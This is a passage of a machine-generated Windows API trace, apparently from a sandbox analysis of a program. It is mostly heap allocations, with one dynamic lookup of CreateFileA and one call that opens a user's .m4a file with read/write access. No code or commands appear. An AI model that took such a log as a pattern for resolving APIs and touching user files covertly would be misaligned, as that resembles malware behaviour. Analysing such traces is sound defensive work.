0x9bd918 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.422] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0184.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd918 [0184.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd918, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0184.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.422] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0184.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0184.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd918, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0184.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.423] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0184.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0184.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0184.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0184.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53) returned 0x8c4a48 [0184.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", cchWideChar=83, lpMultiByteStr=0x8c4a48, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a", lpUsedDefaultChar=0x0) returned 83 [0184.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0184.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0184.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0184.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.425] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\kqpdy.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0184.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0184.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa6) returned 0x8fcbc0 [0184.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=83, lpWideCharStr=0x8fcbc0, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.m4a") returned 83 [0184.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0184.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0184.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0184.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.428] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0184.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0184.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0184.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0184.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.430] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0184.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0184.431] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0184.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0184.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0184.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0184.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0184.432] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 